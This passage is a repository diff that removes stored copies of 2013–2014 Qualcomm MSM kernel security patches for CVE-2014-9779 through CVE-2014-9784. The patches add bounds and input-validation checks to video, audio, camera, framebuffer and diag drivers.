-@@ -1201,6 +1201,12 @@ static u32 vid_dec_set_h264_mv_buffers(struct video_client_ctx *client_ctx,
- 	vcd_h264_mv_buffer->pmem_fd = mv_data->pmem_fd;
- 	vcd_h264_mv_buffer->offset = mv_data->offset;
- 
-+	if (mv_data->count > MAX_MV_BUFFERS) {
-+		ERR("MV buffers maximum count reached, count = %d",
-+			mv_data->count);
-+		return false;
-+	}
-+
- 	if (!vcd_get_ion_status()) {
- 		if (get_pmem_file(vcd_h264_mv_buffer->pmem_fd,
- 			(unsigned long *) (&(vcd_h264_mv_buffer->
-diff --git a/include/media/msm/vidc_init.h b/include/media/msm/vidc_init.h
-index c35f770..5df0c3e 100644
---- a/include/media/msm/vidc_init.h
-+++ b/include/media/msm/vidc_init.h
-@@ -20,6 +20,7 @@
- #define VIDC_MAX_NUM_CLIENTS 4
- #define MAX_VIDEO_NUM_OF_BUFF 100
- #define MAX_META_BUFFERS 32
-+#define MAX_MV_BUFFERS 32
- 
- enum buffer_dir {
- 	BUFFER_TYPE_INPUT,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9779/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9779/ANY/0001.patch
deleted file mode 100644
index 1707a9db..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9779/ANY/0001.patch
+++ /dev/null
@@ -1,44 +0,0 @@
-From 0b5f49b360afdebf8ef55df1e48ec141b3629621 Mon Sep 17 00:00:00 2001
-From: Fred Oh <fred@codeaurora.org>
-Date: Fri, 11 Oct 2013 15:07:45 -0700
-Subject: ASoc: msm: qdsp6v2: add vm page offset validation
-
-Lack of range validation can lead wrong mapping or expose arbitrary
-memory page to userspace
-
-Change-Id: I8c6eb1b7255d444bffd9d3748ca4815b11bdf16a
-Signed-off-by: Fred Oh <fred@codeaurora.org>
----
- arch/arm/mach-msm/qdsp6v2/msm_audio_ion.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-(limited to 'arch/arm/mach-msm/qdsp6v2/msm_audio_ion.c')
-
-diff --git a/arch/arm/mach-msm/qdsp6v2/msm_audio_ion.c b/arch/arm/mach-msm/qdsp6v2/msm_audio_ion.c
-index 0a50bcc..2d375ac 100644
---- a/arch/arm/mach-msm/qdsp6v2/msm_audio_ion.c
-+++ b/arch/arm/mach-msm/qdsp6v2/msm_audio_ion.c
-@@ -269,6 +269,7 @@ int msm_audio_ion_mmap(struct audio_buffer *ab,
- 	} else {
- 		ion_phys_addr_t phys_addr;
- 		size_t phys_len;
-+		size_t va_len = 0;
- 		pr_debug("%s: page is NULL\n", __func__);
- 
- 		ret = ion_phys(ab->client, ab->handle, &phys_addr, &phys_len);
-@@ -282,6 +283,12 @@ int msm_audio_ion_mmap(struct audio_buffer *ab,
- 			vma, (unsigned int)vma->vm_start,
- 			(unsigned int)vma->vm_end, vma->vm_pgoff,
- 			(unsigned long int)vma->vm_page_prot);
-+		va_len = vma->vm_end - vma->vm_start;
-+		if ((offset > phys_len) || (va_len > phys_len-offset)) {
-+			pr_err("wrong offset size %ld, lens= %d, va_len=%d\n",
-+				offset, phys_len, va_len);
-+			return -EINVAL;
-+		}
- 		ret =  remap_pfn_range(vma, vma->vm_start,
- 				__phys_to_pfn(phys_addr) + vma->vm_pgoff,
- 				vma->vm_end - vma->vm_start,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9780/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9780/ANY/0001.patch
deleted file mode 100644
index 74af5d5a..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9780/ANY/0001.patch
+++ /dev/null
@@ -1,30 +0,0 @@
-From b5bb13e1f738f90df11e0c17f843c73999a84a54 Mon Sep 17 00:00:00 2001
-From: Terence Hampson <thampson@codeaurora.org>
-Date: Thu, 19 Sep 2013 10:53:18 -0400
-Subject: mdss: mdp3: Validate input from userspace
-
-Fully verify that the values from client are safe to use.
-
-Change-Id: I73d6839f5bccd53b8bc2d812dc7673b13735299c
-Signed-off-by: Terence Hampson <thampson@codeaurora.org>
----
- drivers/video/msm/mdss/mdp3_ctrl.c | 3 ++-
- 1 file changed, 2 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/video/msm/mdss/mdp3_ctrl.c b/drivers/video/msm/mdss/mdp3_ctrl.c
-index ee51e92..1d6d437 100644
---- a/drivers/video/msm/mdss/mdp3_ctrl.c
-+++ b/drivers/video/msm/mdss/mdp3_ctrl.c
-@@ -1218,7 +1218,8 @@ static int mdp3_ctrl_lut_update(struct msm_fb_data_type *mfd,
- 	if (!mdp3_session->dma->config_lut)
- 		return -EINVAL;
- 
--	if (cmap->start + cmap->len > MDP_LUT_SIZE) {
-+	if (cmap->start > MDP_LUT_SIZE || cmap->len > MDP_LUT_SIZE ||
-+			(cmap->start + cmap->len > MDP_LUT_SIZE)) {
- 		pr_err("mdp3_ctrl_lut_update invalid arguments\n");
- 		return  -EINVAL;
- 	}
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9781/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9781/ANY/0001.patch
deleted file mode 100644
index 29a5e0d5..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9781/ANY/0001.patch
+++ /dev/null
@@ -1,39 +0,0 @@
-From a2b5237ad265ec634489c8b296d870827b2a1b13 Mon Sep 17 00:00:00 2001
-From: Shalabh Jain <shalabhj@codeaurora.org>
-Date: Tue, 12 Nov 2013 15:10:44 -0800
-Subject: fbcmap: prevent memory overflow
-
-Add bounds check before copying data to prevent
-buffer overflow.
-
-Change-Id: I47b9685b1ab13c4863fb6db62bbb9497a00b36da
-Signed-off-by: Shalabh Jain <shalabhj@codeaurora.org>
----
- drivers/video/fbcmap.c | 6 ++++--
- 1 file changed, 4 insertions(+), 2 deletions(-)
-
-(limited to 'drivers/video')
-
-diff --git a/drivers/video/fbcmap.c b/drivers/video/fbcmap.c
-index 31e93a5..f26570d 100644
---- a/drivers/video/fbcmap.c
-+++ b/drivers/video/fbcmap.c
-@@ -203,11 +203,13 @@ int fb_cmap_to_user(const struct fb_cmap *from, struct fb_cmap_user *to)
- 		fromoff = to->start - from->start;
- 	else
- 		tooff = from->start - to->start;
-+	if ((to->len <= tooff) || (from->len <= fromoff))
-+		return -EINVAL;
-+
- 	size = to->len - tooff;
-+
- 	if (size > (int) (from->len - fromoff))
- 		size = from->len - fromoff;
--	if (size <= 0)
--		return -EINVAL;
- 	size *= sizeof(u16);
- 
- 	if (from->red && to->red)
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9782/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9782/ANY/0001.patch
deleted file mode 100644
index 7fa4a12a..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9782/ANY/0001.patch
+++ /dev/null
@@ -1,135 +0,0 @@
-From 2e57a46ab2ba7299d99d9cdc1382bd1e612963fb Mon Sep 17 00:00:00 2001
-From: Hariram Purushothaman <hpurus@codeaurora.org>
-Date: Wed, 24 Jul 2013 10:42:21 -0700
-Subject: msm: camera: Fix various small issues in Actuator driver
-
-Bound check and validate userspace parameters direction,
-number of steps and direction sign. Also fix possible
-memory leak in certain error cases.
-
-CRs-Fixed: 511349
-Change-Id: Icaa324468574494fb40f2de78e522090806744cb
-Signed-off-by: Hariram Purushothaman <hpurus@codeaurora.org>
----
- .../msm/camera_v2/sensor/actuator/msm_actuator.c   | 40 +++++++++++++++++++---
- include/media/msm_cam_sensor.h                     |  4 +++
- 2 files changed, 40 insertions(+), 4 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c b/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-index 87178b7..fe2c16f 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/actuator/msm_actuator.c
-@@ -245,6 +245,20 @@ static int32_t msm_actuator_move_focus(
- 	if (dest_step_pos == a_ctrl->curr_step_pos)
- 		return rc;
- 
-+	if ((sign_dir > MSM_ACTUATOR_MOVE_SIGNED_NEAR) ||
-+		(sign_dir < MSM_ACTUATOR_MOVE_SIGNED_FAR)) {
-+		pr_err("Invalid sign_dir = %d\n", sign_dir);
-+		return -EFAULT;
-+	}
-+	if ((dir > MOVE_FAR) || (dir < MOVE_NEAR)) {
-+		pr_err("Invalid direction = %d\n", dir);
-+		return -EFAULT;
-+	}
-+	if (dest_step_pos > a_ctrl->total_steps) {
-+		pr_err("Step pos greater than total steps = %d\n",
-+		dest_step_pos);
-+		return -EFAULT;
-+	}
- 	curr_lens_pos = a_ctrl->step_position_table[a_ctrl->curr_step_pos];
- 	a_ctrl->i2c_tbl_index = 0;
- 	CDBG("curr_step_pos =%d dest_step_pos =%d curr_lens_pos=%d\n",
-@@ -318,6 +332,12 @@ static int32_t msm_actuator_init_step_table(struct msm_actuator_ctrl_t *a_ctrl,
- 	kfree(a_ctrl->step_position_table);
- 	a_ctrl->step_position_table = NULL;
- 
-+	if (set_info->af_tuning_params.total_steps
-+		>  MAX_ACTUATOR_AF_TOTAL_STEPS) {
-+		pr_err("Max actuator totalsteps exceeded = %d\n",
-+		set_info->af_tuning_params.total_steps);
-+		return -EFAULT;
-+	}
- 	/* Fill step position table */
- 	a_ctrl->step_position_table =
- 		kmalloc(sizeof(uint16_t) *
-@@ -409,12 +429,19 @@ static int32_t msm_actuator_init(struct msm_actuator_ctrl_t *a_ctrl,
- 		pr_err("Actuator function table not found\n");
- 		return rc;
- 	}
--
--	a_ctrl->region_size = set_info->af_tuning_params.region_size;
--	if (a_ctrl->region_size > MAX_ACTUATOR_REGION) {
-+	if (set_info->af_tuning_params.total_steps
-+		>  MAX_ACTUATOR_AF_TOTAL_STEPS) {
-+		pr_err("Max actuator totalsteps exceeded = %d\n",
-+		set_info->af_tuning_params.total_steps);
-+		return -EFAULT;
-+	}
-+	if (set_info->af_tuning_params.region_size
-+		> MAX_ACTUATOR_REGION) {
- 		pr_err("MAX_ACTUATOR_REGION is exceeded.\n");
- 		return -EFAULT;
- 	}
-+
-+	a_ctrl->region_size = set_info->af_tuning_params.region_size;
- 	a_ctrl->pwd_step = set_info->af_tuning_params.pwd_step;
- 	a_ctrl->total_steps = set_info->af_tuning_params.total_steps;
- 
-@@ -461,7 +488,9 @@ static int32_t msm_actuator_init(struct msm_actuator_ctrl_t *a_ctrl,
- 		return -EFAULT;
- 	}
- 
--	if (set_info->actuator_params.init_setting_size) {
-+	if (set_info->actuator_params.init_setting_size &&
-+		set_info->actuator_params.init_setting_size
-+		<= MAX_ACTUATOR_REG_TBL_SIZE) {
- 		if (a_ctrl->func_tbl->actuator_init_focus) {
- 			init_settings = kmalloc(sizeof(struct reg_settings_t) *
- 				(set_info->actuator_params.init_setting_size),
-@@ -793,6 +822,7 @@ static int32_t msm_actuator_platform_probe(struct platform_device *pdev)
- 		&pdev->id);
- 	CDBG("cell-index %d, rc %d\n", pdev->id, rc);
- 	if (rc < 0) {
-+		kfree(msm_actuator_t);
- 		pr_err("failed rc %d\n", rc);
- 		return rc;
- 	}
-@@ -801,6 +831,7 @@ static int32_t msm_actuator_platform_probe(struct platform_device *pdev)
- 		&msm_actuator_t->cci_master);
- 	CDBG("qcom,cci-master %d, rc %d\n", msm_actuator_t->cci_master, rc);
- 	if (rc < 0) {
-+		kfree(msm_actuator_t);
- 		pr_err("failed rc %d\n", rc);
- 		return rc;
- 	}
-@@ -817,6 +848,7 @@ static int32_t msm_actuator_platform_probe(struct platform_device *pdev)
- 	msm_actuator_t->i2c_client.cci_client = kzalloc(sizeof(
- 		struct msm_camera_cci_client), GFP_KERNEL);
- 	if (!msm_actuator_t->i2c_client.cci_client) {
-+		kfree(msm_actuator_t);
- 		pr_err("failed no memory\n");
- 		return -ENOMEM;
- 	}
-diff --git a/include/media/msm_cam_sensor.h b/include/media/msm_cam_sensor.h
-index 326e8bf..08a2025 100644
---- a/include/media/msm_cam_sensor.h
-+++ b/include/media/msm_cam_sensor.h
-@@ -40,10 +40,14 @@
- #define MAX_ACTUATOR_REGION 5
- #define MAX_ACTUATOR_INIT_SET 12
- #define MAX_ACTUATOR_REG_TBL_SIZE 8
-+#define MAX_ACTUATOR_AF_TOTAL_STEPS 1024
- 
- #define MOVE_NEAR 0
- #define MOVE_FAR  1
- 
-+#define MSM_ACTUATOR_MOVE_SIGNED_FAR -1
-+#define MSM_ACTUATOR_MOVE_SIGNED_NEAR  1
-+
- #define MAX_EEPROM_NAME 32
- 
- #define MAX_AF_ITERATIONS 3
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9783/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9783/ANY/0001.patch
deleted file mode 100644
index bcb90e1e..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9783/ANY/0001.patch
+++ /dev/null
@@ -1,218 +0,0 @@
-From 2b1050b49a9a5f7bb57006648d145e001a3eaa8b Mon Sep 17 00:00:00 2001
-From: Hariram Purushothaman <hpurus@codeaurora.org>
-Date: Wed, 31 Jul 2013 14:30:36 -0700
-Subject: msm: camera: Fix various small issues in cci driver
-
-Remove some unused ioctl exposed, Also add
-some bound checks for ioctl user params.
-
-Change-Id: Ifdd441fdb25fd20b005c4e4e1ebe4e203f1216ac
-CRs-Fixed: 511382
-Signed-off-by: Hariram Purushothaman <hpurus@codeaurora.org>
----
- .../platform/msm/camera_v2/sensor/cci/msm_cci.c    | 101 +++++++++++++--------
- include/media/msm_cam_sensor.h                     |   2 +
- 2 files changed, 63 insertions(+), 40 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c b/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-index 7f4f231..6beb92e 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-@@ -41,6 +41,9 @@
- 
- /* Max bytes that can be read per CCI read transaction */
- #define CCI_READ_MAX 12
-+#define CCI_I2C_READ_MAX_RETRIES 3
-+#define CCI_I2C_MAX_READ 8192
-+#define CCI_I2C_MAX_WRITE 8192
- 
- static struct v4l2_subdev *g_cci_subdev;
- 
-@@ -87,36 +90,6 @@ static void msm_cci_set_clk_param(struct cci_device *cci_dev)
- 	return;
- }
- 
--static int32_t msm_cci_i2c_config_sync_timer(struct v4l2_subdev *sd,
--	struct msm_camera_cci_ctrl *c_ctrl)
--{
--	struct cci_device *cci_dev;
--	cci_dev = v4l2_get_subdevdata(sd);
--	msm_camera_io_w(c_ctrl->cci_info->cid, cci_dev->base +
--		CCI_SET_CID_SYNC_TIMER_0_ADDR + (c_ctrl->cci_info->cid * 0x4));
--	return 0;
--}
--
--static int32_t msm_cci_i2c_set_freq(struct v4l2_subdev *sd,
--	struct msm_camera_cci_ctrl *c_ctrl)
--{
--	struct cci_device *cci_dev;
--	uint32_t val;
--	cci_dev = v4l2_get_subdevdata(sd);
--	val = c_ctrl->cci_info->freq;
--	msm_camera_io_w(val, cci_dev->base + CCI_I2C_M0_SCL_CTL_ADDR +
--		c_ctrl->cci_info->cci_i2c_master*0x100);
--	msm_camera_io_w(val, cci_dev->base + CCI_I2C_M0_SDA_CTL_0_ADDR +
--		c_ctrl->cci_info->cci_i2c_master*0x100);
--	msm_camera_io_w(val, cci_dev->base + CCI_I2C_M0_SDA_CTL_1_ADDR +
--		c_ctrl->cci_info->cci_i2c_master*0x100);
--	msm_camera_io_w(val, cci_dev->base + CCI_I2C_M0_SDA_CTL_2_ADDR +
--		c_ctrl->cci_info->cci_i2c_master*0x100);
--	msm_camera_io_w(val, cci_dev->base + CCI_I2C_M0_MISC_CTL_ADDR +
--		c_ctrl->cci_info->cci_i2c_master*0x100);
--	return 0;
--}
--
- static void msm_cci_flush_queue(struct cci_device *cci_dev,
- 	enum cci_i2c_master_t master)
- {
-@@ -213,8 +186,29 @@ static int32_t msm_cci_data_queue(struct cci_device *cci_dev,
- 	uint16_t cmd_size = i2c_msg->size;
- 	struct msm_camera_i2c_reg_conf *i2c_cmd = i2c_msg->reg_conf_tbl;
- 	enum cci_i2c_master_t master = c_ctrl->cci_info->cci_i2c_master;
-+
-+	if (i2c_cmd == NULL) {
-+		pr_err("%s:%d Failed line\n", __func__,
-+			__LINE__);
-+		return -EINVAL;
-+	}
-+
-+	if ((!cmd_size) || (cmd_size > CCI_I2C_MAX_WRITE)) {
-+		pr_err("%s:%d Failed line\n", __func__, __LINE__);
-+		return -EINVAL;
-+	}
-+
- 	CDBG("%s addr type %d data type %d\n", __func__,
- 		i2c_msg->addr_type, i2c_msg->data_type);
-+
-+	if (i2c_msg->addr_type >= MSM_CAMERA_I2C_ADDR_TYPE_MAX) {
-+		pr_err("%s failed line %d\n", __func__, __LINE__);
-+		return -EINVAL;
-+	}
-+	if (i2c_msg->data_type >= MSM_CAMERA_I2C_DATA_TYPE_MAX) {
-+		pr_err("%s failed line %d\n", __func__, __LINE__);
-+		return -EINVAL;
-+	}
- 	/* assume total size within the max queue */
- 	while (cmd_size) {
- 		CDBG("%s cmd_size %d addr 0x%x data 0x%x", __func__,
-@@ -321,6 +315,18 @@ static int32_t msm_cci_i2c_read(struct v4l2_subdev *sd,
- 		goto ERROR;
- 	}
- 
-+	if (c_ctrl->cci_info->retries > CCI_I2C_READ_MAX_RETRIES) {
-+		pr_err("%s:%d More than max retries\n", __func__,
-+			__LINE__);
-+		goto ERROR;
-+	}
-+
-+	if (read_cfg->data == NULL) {
-+		pr_err("%s:%d Data ptr is NULL\n", __func__,
-+			__LINE__);
-+		goto ERROR;
-+	}
-+
- 	CDBG("%s master %d, queue %d\n", __func__, master, queue);
- 	CDBG("%s set param sid 0x%x retries %d id_map %d\n", __func__,
- 		c_ctrl->cci_info->sid, c_ctrl->cci_info->retries,
-@@ -341,6 +347,11 @@ static int32_t msm_cci_i2c_read(struct v4l2_subdev *sd,
- 		goto ERROR;
- 	}
- 
-+	if (read_cfg->addr_type >= MSM_CAMERA_I2C_ADDR_TYPE_MAX) {
-+		CDBG("%s failed line %d\n", __func__, __LINE__);
-+		goto ERROR;
-+	}
-+
- 	if (read_cfg->addr_type == MSM_CAMERA_I2C_BYTE_ADDR)
- 		val = CCI_I2C_WRITE_DISABLE_P_CMD | (read_cfg->addr_type << 4) |
- 			((read_cfg->addr & 0xFF) << 8);
-@@ -454,9 +465,14 @@ static int32_t msm_cci_i2c_read_bytes(struct v4l2_subdev *sd,
- 		return -EINVAL;
- 	}
- 
-+	if (c_ctrl->cci_info->cci_i2c_master > MASTER_MAX) {
-+		pr_err("%s:%d Invalid I2C master addr\n", __func__, __LINE__);
-+		return -EINVAL;
-+	}
-+
- 	master = c_ctrl->cci_info->cci_i2c_master;
- 	read_cfg = &c_ctrl->cfg.cci_i2c_read_cfg;
--	if (!read_cfg->num_byte) {
-+	if ((!read_cfg->num_byte) || (read_cfg->num_byte > CCI_I2C_MAX_READ)) {
- 		pr_err("%s:%d read num bytes 0\n", __func__, __LINE__);
- 		rc = -EINVAL;
- 		goto ERROR;
-@@ -494,6 +510,10 @@ static int32_t msm_cci_i2c_write(struct v4l2_subdev *sd,
- 	enum cci_i2c_master_t master;
- 	enum cci_i2c_queue_t queue = QUEUE_0;
- 	cci_dev = v4l2_get_subdevdata(sd);
-+	if (c_ctrl->cci_info->cci_i2c_master > MASTER_MAX) {
-+		pr_err("%s:%d Invalid I2C master addr\n", __func__, __LINE__);
-+		return -EINVAL;
-+	}
- 	master = c_ctrl->cci_info->cci_i2c_master;
- 	CDBG("%s master %d, queue %d\n", __func__, master, queue);
- 	CDBG("%s set param sid 0x%x retries %d id_map %d\n", __func__,
-@@ -514,6 +534,11 @@ static int32_t msm_cci_i2c_write(struct v4l2_subdev *sd,
- 			__LINE__, rc);
- 		goto ERROR;
- 	}
-+	if (c_ctrl->cci_info->retries > CCI_I2C_READ_MAX_RETRIES) {
-+		pr_err("%s:%d More than max retries\n", __func__,
-+			__LINE__);
-+		goto ERROR;
-+	}
- 
- 	val = CCI_I2C_SET_PARAM_CMD | c_ctrl->cci_info->sid << 4 |
- 		c_ctrl->cci_info->retries << 16 |
-@@ -533,7 +558,11 @@ static int32_t msm_cci_i2c_write(struct v4l2_subdev *sd,
- 		goto ERROR;
- 	}
- 
--	msm_cci_data_queue(cci_dev, c_ctrl, queue);
-+	rc = msm_cci_data_queue(cci_dev, c_ctrl, queue);
-+	if (rc < 0) {
-+		CDBG("%s failed line %d\n", __func__, __LINE__);
-+		goto ERROR;
-+	}
- 	val = CCI_I2C_UNLOCK_CMD;
- 	CDBG("%s:%d CCI_I2C_UNLOCK_CMD\n", __func__, __LINE__);
- 	rc = msm_cci_write_i2c_queue(cci_dev, val, master, queue);
-@@ -703,14 +732,6 @@ static int32_t msm_cci_config(struct v4l2_subdev *sd,
- 	case MSM_CCI_RELEASE:
- 		rc = msm_cci_release(sd);
- 		break;
--	case MSM_CCI_SET_SID:
--		break;
--	case MSM_CCI_SET_FREQ:
--		rc = msm_cci_i2c_set_freq(sd, cci_ctrl);
--		break;
--	case MSM_CCI_SET_SYNC_CID:
--		rc = msm_cci_i2c_config_sync_timer(sd, cci_ctrl);
--		break;
- 	case MSM_CCI_I2C_READ:
- 		rc = msm_cci_i2c_read_bytes(sd, cci_ctrl);
- 		break;
-diff --git a/include/media/msm_cam_sensor.h b/include/media/msm_cam_sensor.h
-index 2805401..da16bb8 100644
---- a/include/media/msm_cam_sensor.h
-+++ b/include/media/msm_cam_sensor.h
-@@ -52,6 +52,7 @@ enum msm_camera_i2c_reg_addr_type {
- 	MSM_CAMERA_I2C_BYTE_ADDR = 1,
- 	MSM_CAMERA_I2C_WORD_ADDR,
- 	MSM_CAMERA_I2C_3B_ADDR,
-+	MSM_CAMERA_I2C_ADDR_TYPE_MAX,
- };
- 
- enum msm_camera_i2c_data_type {
-@@ -62,6 +63,7 @@ enum msm_camera_i2c_data_type {
- 	MSM_CAMERA_I2C_SET_WORD_MASK,
- 	MSM_CAMERA_I2C_UNSET_WORD_MASK,
- 	MSM_CAMERA_I2C_SET_BYTE_WRITE_MASK_DATA,
-+	MSM_CAMERA_I2C_DATA_TYPE_MAX,
- };
- 
- enum msm_sensor_power_seq_type_t {
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9783/ANY/0002.patch b/Patches/Linux_CVEs/CVE-2014-9783/ANY/0002.patch
deleted file mode 100644
index f78fd57b..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9783/ANY/0002.patch
+++ /dev/null
@@ -1,50 +0,0 @@
-From a7502f4f801bb95bff73617309835bb7a016cde5 Mon Sep 17 00:00:00 2001
-From: Xu Han <hanxu@codeaurora.org>
-Date: Wed, 25 Sep 2013 15:28:32 -0700
-Subject: msm: camera: Checking an enum value greater than zero
-
-An enum value cci_i2c_master is not checked to be greater than 0.
-Add the check.
-
-Change-Id: Ibe75ab7155def45d81b8127c5eda3fa2ed570bce
-Signed-off-by: Xu Han <hanxu@codeaurora.org>
----
- drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c | 8 +++++---
- 1 file changed, 5 insertions(+), 3 deletions(-)
-
-diff --git a/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c b/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-index 273d779..401a671 100644
---- a/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-+++ b/drivers/media/platform/msm/camera_v2/sensor/cci/msm_cci.c
-@@ -479,7 +479,8 @@ static int32_t msm_cci_i2c_read_bytes(struct v4l2_subdev *sd,
- 		return -EINVAL;
- 	}
- 
--	if (c_ctrl->cci_info->cci_i2c_master > MASTER_MAX) {
-+	if (c_ctrl->cci_info->cci_i2c_master > MASTER_MAX
-+			|| c_ctrl->cci_info->cci_i2c_master < 0) {
- 		pr_err("%s:%d Invalid I2C master addr\n", __func__, __LINE__);
- 		return -EINVAL;
- 	}
-@@ -524,7 +525,8 @@ static int32_t msm_cci_i2c_write(struct v4l2_subdev *sd,
- 	enum cci_i2c_master_t master;
- 	enum cci_i2c_queue_t queue = QUEUE_0;
- 	cci_dev = v4l2_get_subdevdata(sd);
--	if (c_ctrl->cci_info->cci_i2c_master > MASTER_MAX) {
-+	if (c_ctrl->cci_info->cci_i2c_master > MASTER_MAX
-+			|| c_ctrl->cci_info->cci_i2c_master < 0) {
- 		pr_err("%s:%d Invalid I2C master addr\n", __func__, __LINE__);
- 		return -EINVAL;
- 	}
-@@ -661,7 +663,7 @@ static int32_t msm_cci_init(struct v4l2_subdev *sd,
- 		CDBG("%s ref_count %d\n", __func__, cci_dev->ref_count);
- 		master = c_ctrl->cci_info->cci_i2c_master;
- 		CDBG("%s:%d master %d\n", __func__, __LINE__, master);
--		if (master < MASTER_MAX) {
-+		if (master < MASTER_MAX && master >= 0) {
- 			mutex_lock(&cci_dev->cci_master_info[master].mutex);
- 			/* Set reset pending flag to TRUE */
- 			cci_dev->cci_master_info[master].reset_pending = TRUE;
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2014-9784/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2014-9784/ANY/0001.patch
deleted file mode 100644
index 7314dbab..00000000
--- a/Patches/Linux_CVEs/CVE-2014-9784/ANY/0001.patch
+++ /dev/null
@@ -1,203 +0,0 @@
-From 36503d639cedcc73880974ed92132247576e72ba Mon Sep 17 00:00:00 2001
-From: Sreelakshmi Gownipalli <sgownipa@codeaurora.org>
-Date: Tue, 14 Jan 2014 16:54:46 -0800
-Subject: diag: Fix for diag debugfs buffer overflow
-
-Diag debugfs buffer has potential buffer overflow scenario which can cause
-memory corruption. Added safeguard to prevent this.
-
-Crs-fixed: 585147
-Change-Id: Ie1f099bb4bb626adff99ae225966aef70c1bc15e
-Signed-off-by: Sreelakshmi Gownipalli <sgownipa@codeaurora.org>
----
- drivers/char/diag/diag_debugfs.c | 44 +++++++++++++++++++++++++---------------
- 1 file changed, 28 insertions(+), 16 deletions(-)
-
-diff --git a/drivers/char/diag/diag_debugfs.c b/drivers/char/diag/diag_debugfs.c
-index d63d34b..96c0fa0 100644
---- a/drivers/char/diag/diag_debugfs.c
-+++ b/drivers/char/diag/diag_debugfs.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2011-2013, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2011-2014, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -33,14 +33,14 @@ static ssize_t diag_dbgfs_read_status(struct file *file, char __user *ubuf,
- {
- 	char *buf;
- 	int ret;
--
-+	unsigned int buf_size;
- 	buf = kzalloc(sizeof(char) * DEBUG_BUF_SIZE, GFP_KERNEL);
- 	if (!buf) {
- 		pr_err("diag: %s, Error allocating memory\n", __func__);
- 		return -ENOMEM;
- 	}
--
--	ret = scnprintf(buf, DEBUG_BUF_SIZE,
-+	buf_size = ksize(buf);
-+	ret = scnprintf(buf, buf_size,
- 		"modem ch: 0x%p\n"
- 		"lpass ch: 0x%p\n"
- 		"riva ch: 0x%p\n"
-@@ -183,7 +183,7 @@ static ssize_t diag_dbgfs_read_status(struct file *file, char __user *ubuf,
- 		driver->real_time_mode);
- 
- #ifdef CONFIG_DIAG_OVER_USB
--	ret += scnprintf(buf+ret, DEBUG_BUF_SIZE,
-+	ret += scnprintf(buf+ret, buf_size-ret,
- 		"usb_connected: %d\n",
- 		driver->usb_connected);
- #endif
-@@ -200,7 +200,8 @@ static ssize_t diag_dbgfs_read_dcistats(struct file *file,
- 	unsigned int bytes_remaining, bytes_written = 0;
- 	unsigned int bytes_in_buf = 0, i = 0;
- 	struct diag_dci_data_info *temp_data = dci_data_smd;
--	int buf_size = (DEBUG_BUF_SIZE < count) ? DEBUG_BUF_SIZE : count;
-+	unsigned int buf_size;
-+	buf_size = (DEBUG_BUF_SIZE < count) ? DEBUG_BUF_SIZE : count;
- 
- 	if (diag_dbgfs_dci_finished) {
- 		diag_dbgfs_dci_finished = 0;
-@@ -213,6 +214,7 @@ static ssize_t diag_dbgfs_read_dcistats(struct file *file,
- 		return -ENOMEM;
- 	}
- 
-+	buf_size = ksize(buf);
- 	bytes_remaining = buf_size;
- 
- 	if (diag_dbgfs_dci_data_index == 0) {
-@@ -281,6 +283,7 @@ static ssize_t diag_dbgfs_read_workpending(struct file *file,
- {
- 	char *buf;
- 	int ret;
-+	unsigned int buf_size;
- 
- 	buf = kzalloc(sizeof(char) * DEBUG_BUF_SIZE, GFP_KERNEL);
- 	if (!buf) {
-@@ -288,7 +291,8 @@ static ssize_t diag_dbgfs_read_workpending(struct file *file,
- 		return -ENOMEM;
- 	}
- 
--	ret = scnprintf(buf, DEBUG_BUF_SIZE,
-+	buf_size = ksize(buf);
-+	ret = scnprintf(buf, buf_size,
- 		"Pending status for work_stucts:\n"
- 		"diag_drain_work: %d\n"
- 		"Modem data diag_read_smd_work: %d\n"
-@@ -336,7 +340,7 @@ static ssize_t diag_dbgfs_read_workpending(struct file *file,
- 						diag_notify_update_smd_work)));
- 
- #ifdef CONFIG_DIAG_OVER_USB
--	ret += scnprintf(buf+ret, DEBUG_BUF_SIZE,
-+	ret += scnprintf(buf+ret, buf_size-ret,
- 		"diag_proc_hdlc_work: %d\n"
- 		"diag_read_work: %d\n",
- 		work_pending(&(driver->diag_proc_hdlc_work)),
-@@ -357,7 +361,8 @@ static ssize_t diag_dbgfs_read_table(struct file *file, char __user *ubuf,
- 	unsigned int bytes_remaining;
